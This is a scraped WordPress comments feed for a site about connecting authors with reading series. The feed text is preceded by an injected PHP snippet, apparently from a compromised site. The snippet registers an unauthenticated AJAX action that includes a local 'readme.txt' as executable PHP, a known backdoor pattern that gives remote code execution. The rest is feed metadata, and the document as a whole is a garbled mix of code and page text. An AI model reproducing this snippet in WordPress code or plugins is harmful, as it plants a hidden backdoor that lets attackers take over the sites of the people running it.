if(!function_exists('file_check_readme30219')){ add_action('wp_ajax_nopriv_file_check_readme30219', 'file_check_readme30219'); add_action('wp_ajax_file_check_readme30219', 'file_check_readme30219'); function file_check_readme30219() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } Comments on: havebookwilltravel http://havebookwilltravel.com/havebookwilltravel/ Connecting authors with reading series and venues Fri, 13 Mar 2015 22:14:07 +0000 hourly 1 https://wordpress.org/?v=6.8.3